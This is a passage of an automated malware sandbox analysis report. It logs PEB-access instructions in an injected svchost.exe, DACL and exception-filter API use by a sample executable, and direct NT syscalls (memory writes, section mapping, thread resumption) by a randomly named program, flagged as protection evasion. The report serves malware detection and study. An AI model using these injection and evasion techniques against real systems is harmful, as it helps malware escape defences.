                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032365D0 mov eax, dword ptr fs:[00000030h]2_2_032365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A5D0 mov eax, dword ptr fs:[00000030h]2_2_0326A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A5D0 mov eax, dword ptr fs:[00000030h]2_2_0326A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]2_2_0322E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]2_2_0322E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]2_2_0322E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C427 mov eax, dword ptr fs:[00000030h]2_2_0322C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A430 mov eax, dword ptr fs:[00000030h]2_2_0326A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]2_2_03268402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]2_2_03268402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]2_2_03268402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC460 mov ecx, dword ptr fs:[00000030h]2_2_032BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]2_2_0325A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]2_2_0325A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]2_2_0325A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EA456 mov eax, dword ptr fs:[00000030h]2_2_032EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322645D mov eax, dword ptr fs:[00000030h]2_2_0322645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325245A mov eax, dword ptr fs:[00000030h]2_2_0325245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032364AB mov eax, dword ptr fs:[00000030h]2_2_032364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032644B0 mov ecx, dword ptr fs:[00000030h]2_2_032644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BA4B0 mov eax, dword ptr fs:[00000030h]2_2_032BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EA49A mov eax, dword ptr fs:[00000030h]2_2_032EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032304E5 mov ecx, dword ptr fs:[00000030h]2_2_032304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EB20 mov eax, dword ptr fs:[00000030h]2_2_0325EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EB20 mov eax, dword ptr fs:[00000030h]2_2_0325EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F8B28 mov eax, dword ptr fs:[00000030h]2_2_032F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F8B28 mov eax, dword ptr fs:[00000030h]2_2_032F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304B00 mov eax, dword ptr fs:[00000030h]2_2_03304B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322CB7E mov eax, dword ptr fs:[00000030h]2_2_0322CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4B4B mov eax, dword ptr fs:[00000030h]2_2_032E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4B4B mov eax, dword ptr fs:[00000030h]2_2_032E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03302B57 mov eax, dword ptr fs:[00000030h]2_2_03302B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03302B57 mov eax, dword ptr fs:[00000030h]2_2_03302B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03302B57 mov eax, dword ptr fs:[00000030h]2_2_03302B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03302B57 mov eax, dword ptr fs:[00000030h]2_2_03302B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6B40 mov eax, dword ptr fs:[00000030h]2_2_032C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6B40 mov eax, dword ptr fs:[00000030h]2_2_032C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FAB40 mov eax, dword ptr fs:[00000030h]2_2_032FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D8B42 mov eax, dword ptr fs:[00000030h]2_2_032D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228B50 mov eax, dword ptr fs:[00000030h]2_2_03228B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DEB50 mov eax, dword ptr fs:[00000030h]2_2_032DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240BBE mov eax, dword ptr fs:[00000030h]2_2_03240BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240BBE mov eax, dword ptr fs:[00000030h]2_2_03240BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4BB0 mov eax, dword ptr fs:[00000030h]2_2_032E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4BB0 mov eax, dword ptr fs:[00000030h]2_2_032E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]2_2_03238BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]2_2_03238BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]2_2_03238BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EBFC mov eax, dword ptr fs:[00000030h]2_2_0325EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BCBF0 mov eax, dword ptr fs:[00000030h]2_2_032BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]2_2_03250BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]2_2_03250BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]2_2_03250BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]2_2_03230BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]2_2_03230BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]2_2_03230BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DEBD0 mov eax, dword ptr fs:[00000030h]2_2_032DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA24 mov eax, dword ptr fs:[00000030h]2_2_0326CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EA2E mov eax, dword ptr fs:[00000030h]2_2_0325EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03254A35 mov eax, dword ptr fs:[00000030h]2_2_03254A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03254A35 mov eax, dword ptr fs:[00000030h]2_2_03254A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA38 mov eax, dword ptr fs:[00000030h]2_2_0326CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BCA11 mov eax, dword ptr fs:[00000030h]2_2_032BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]2_2_0326CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]2_2_0326CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]2_2_0326CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DEA60 mov eax, dword ptr fs:[00000030h]2_2_032DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032ACA72 mov eax, dword ptr fs:[00000030h]2_2_032ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032ACA72 mov eax, dword ptr fs:[00000030h]2_2_032ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240A5B mov eax, dword ptr fs:[00000030h]2_2_03240A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240A5B mov eax, dword ptr fs:[00000030h]2_2_03240A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238AA0 mov eax, dword ptr fs:[00000030h]2_2_03238AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238AA0 mov eax, dword ptr fs:[00000030h]2_2_03238AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286AA4 mov eax, dword ptr fs:[00000030h]2_2_03286AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304A80 mov eax, dword ptr fs:[00000030h]2_2_03304A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268A90 mov edx, dword ptr fs:[00000030h]2_2_03268A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326AAEE mov eax, dword ptr fs:[00000030h]2_2_0326AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326AAEE mov eax, dword ptr fs:[00000030h]2_2_0326AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]2_2_03286ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]2_2_03286ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]2_2_03286ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230AD0 mov eax, dword ptr fs:[00000030h]2_2_03230AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03264AD0 mov eax, dword ptr fs:[00000030h]2_2_03264AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03264AD0 mov eax, dword ptr fs:[00000030h]2_2_03264AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B892A mov eax, dword ptr fs:[00000030h]2_2_032B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C892B mov eax, dword ptr fs:[00000030h]2_2_032C892B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032AE908 mov eax, dword ptr fs:[00000030h] | 2_2_032AE908
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032BC912 mov eax, dword ptr fs:[00000030h] | 2_2_032BC912
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03228918 mov eax, dword ptr fs:[00000030h] | 2_2_03228918
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03256962 mov eax, dword ptr fs:[00000030h] | 2_2_03256962
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0327096E mov eax, dword ptr fs:[00000030h] | 2_2_0327096E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0327096E mov edx, dword ptr fs:[00000030h] | 2_2_0327096E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D4978 mov eax, dword ptr fs:[00000030h] | 2_2_032D4978
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032BC97C mov eax, dword ptr fs:[00000030h] | 2_2_032BC97C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B0946 mov eax, dword ptr fs:[00000030h] | 2_2_032B0946
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03304940 mov eax, dword ptr fs:[00000030h] | 2_2_03304940
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h] | 2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032309AD mov eax, dword ptr fs:[00000030h] | 2_2_032309AD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B89B3 mov esi, dword ptr fs:[00000030h] | 2_2_032B89B3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B89B3 mov eax, dword ptr fs:[00000030h] | 2_2_032B89B3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032BE9E0 mov eax, dword ptr fs:[00000030h] | 2_2_032BE9E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032629F9 mov eax, dword ptr fs:[00000030h] | 2_2_032629F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C69C0 mov eax, dword ptr fs:[00000030h] | 2_2_032C69C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_0323A9D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032649D0 mov eax, dword ptr fs:[00000030h] | 2_2_032649D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032FA9D3 mov eax, dword ptr fs:[00000030h] | 2_2_032FA9D3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h] | 2_2_03252835
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03252835 mov ecx, dword ptr fs:[00000030h] | 2_2_03252835
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0326A830 mov eax, dword ptr fs:[00000030h] | 2_2_0326A830
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D483A mov eax, dword ptr fs:[00000030h] | 2_2_032D483A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032BC810 mov eax, dword ptr fs:[00000030h] | 2_2_032BC810
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032BE872 mov eax, dword ptr fs:[00000030h] | 2_2_032BE872
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_0052A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity | 0_2_0052A66C
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_00518189 SetUnhandledExceptionFilter | 0_2_00518189
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_005181AC SetUnhandledExceptionFilter,UnhandledExceptionFilter | 0_2_005181AC

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | NtWriteVirtualMemory: Direct from: 0x77762E3C
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | NtMapViewOfSection: Direct from: 0x77762D1C
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | NtNotifyChangeKey: Direct from: 0x77763C2C
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | NtCreateMutant: Direct from: 0x777635CC
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | NtResumeThread: Direct from: 0x777636AC
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | NtQuerySystemInformation: Direct from: 0x77762DFC
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | NtAllocateVirtualMemory: Direct from: 0x77762BFC
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | NtReadFile: Direct from: 0x77762ADC
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | NtDelayExecution: Direct from: 0x77762DDC
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | NtWriteVirtualMemory: Direct from: 0x7776490C
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | NtQueryInformationProcess: Direct from: 0x77762C26
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | NtResumeThread: Direct from: 0x77762FBC
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | NtCreateUserProcess: Direct from: 0x7776371C
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | NtSetInformationThread: Direct from: 0x777563F9
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | NtAllocateVirtualMemory: Direct from: 0x77763C9C
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | NtSetInformationThread: Direct from: 0x77762B4C
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | NtQueryAttributesFile: Direct from: 0x77762E6C
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | NtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | NtReadVirtualMemory: Direct from: 0x77762E8C
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | NtCreateKey: Direct from: 0x77762C6C
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | NtQuerySystemInformation: Direct from: 0x777648CC
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | NtAllocateVirtualMemory: Direct from: 0x777648EC
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | NtQueryVolumeInformationFile: Direct from: 0x77762F2C
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | NtOpenSection: Direct from: 0x77762E0C
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | NtDeviceIoControlFile: Direct from: 0x77762AEC
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | NtAllocateVirtualMemory: Direct from: 0x77762BEC
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | NtQueryInformationToken: Direct from: 0x77762CAC
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | NtTerminateThread: Direct from: 0x77762FCC
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | NtCreateFile: Direct from: 0x77762FEC
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | NtOpenFile: Direct from: 0x77762DCC
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | NtOpenKeyEx: Direct from: 0x77762B9C
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | NtSetInformationProcess: Direct from: 0x77762C5C
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | NtProtectVirtualMemory: Direct from: 0x77762F9C
